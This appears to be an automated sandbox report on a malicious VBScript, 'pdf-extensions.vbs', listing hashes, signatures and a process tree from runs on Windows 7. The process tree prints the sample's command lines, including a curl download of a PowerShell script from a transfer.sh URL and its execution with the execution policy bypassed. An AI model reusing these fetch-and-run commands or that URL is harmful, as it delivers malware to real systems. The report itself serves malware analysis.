Overview
Analysis
max time kernel: 251s
max time network: 397s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 31-03-2023 16:01
Static task static1
Behavioral task behavioral1: $RECYCLE.BIN/$R5K4GOK.js (resource win7-20230220-en)
Behavioral task behavioral2: $RECYCLE.BIN/$R5K4GOK.js (resource win10v2004-20230220-en)
Behavioral task behavioral3: $RECYCLE.BIN/$R7M8AKV.scr (resource win7-20230220-en)
Behavioral task behavioral4: $RECYCLE.BIN/$R7M8AKV.scr (resource win10v2004-20230220-en)
Behavioral task behavioral5: $RECYCLE.BIN/$RC3SQXJ.exe (resource win7-20230220-en)
Behavioral task behavioral6: $RECYCLE.BIN/$RC3SQXJ.exe (resource win10v2004-20230220-en)
Behavioral task behavioral7: $RECYCLE.BIN/$RCMX6RL.js (resource win7-20230220-en)
Behavioral task behavioral8: $RECYCLE.BIN/$RCMX6RL.js (resource win10v2004-20230220-en)
Behavioral task behavioral9: $RECYCLE.BIN/$RHL25IB.exe (resource win7-20230220-en)
Behavioral task behavioral10: $RECYCLE.BIN/$RHL25IB.exe (resource win10v2004-20230220-en)
Behavioral task behavioral11: $RECYCLE.BIN/$RJXIQS1.bat (resource win7-20230220-en)
Behavioral task behavioral12: $RECYCLE.BIN/$RJXIQS1.bat (resource win10v2004-20230220-en)
Behavioral task behavioral13: pdf-extensions.vbs (resource win7-20230220-en)
General
Target: pdf-extensions.vbs
Size: 111KB
MD5: 3fa09c9c6deff87d8c7d42b352ce52b6
SHA1: c69283b1d90cd7fbec45521149292956ca4c6a1f
SHA256: 4b18539613e1c78a58734ef5e60fe4793ca83384930a4172dbe7a008b14fec31
SHA512: 90696b88151fe173fd2bf64c049b6f7f30493d4daf033f36b9f67f8c94f8b75047df1e7129a119d93bfeafb35007a6341bc745dfac78f817f070c2f9ca44f40e
SSDEEP: 12:O+h3awpefBNRxkj5H6NPnqkc+h3awpeZ9nF6NPnJo:O+9xYZNRxo5wqh+9xYZlym
Malware Config
Signatures
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes: pid 1776 powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes: Token: SeDebugPrivilege, pid 1776 powershell.exe
Suspicious use of WriteProcessMemory (15 IoCs)
Processes (source pid and process, target pid and process; each entry was recorded three times):
PID 1996 WScript.exe wrote to memory of 548 cmd.exe
PID 548 cmd.exe wrote to memory of 892 cmd.exe
PID 1996 WScript.exe wrote to memory of 1676 cmd.exe
PID 1676 cmd.exe wrote to memory of 1004 cmd.exe
PID 1004 cmd.exe wrote to memory of 1776 powershell.exe
Processes (indentation shows the parent/child depth)
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\pdf-extensions.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/3DdLPT/coca.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
    Signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe
      Command line: cmd.exe /c curl https://transfer.sh/get/3DdLPT/coca.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
    Signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe
      Command line: cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
      Signatures: Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/1776-58-0x000000001B100000-0x000000001B3E2000-memory.dmp (filesize 2.9MB)
memory/1776-59-0x0000000002410000-0x0000000002418000-memory.dmp (filesize 32KB)
memory/1776-60-0x0000000002390000-0x0000000002410000-memory.dmp (filesize 512KB)
memory/1776-61-0x0000000002390000-0x0000000002410000-memory.dmp (filesize 512KB)
memory/1776-62-0x000000000239B000-0x00000000023D2000-memory.dmp (filesize 220KB)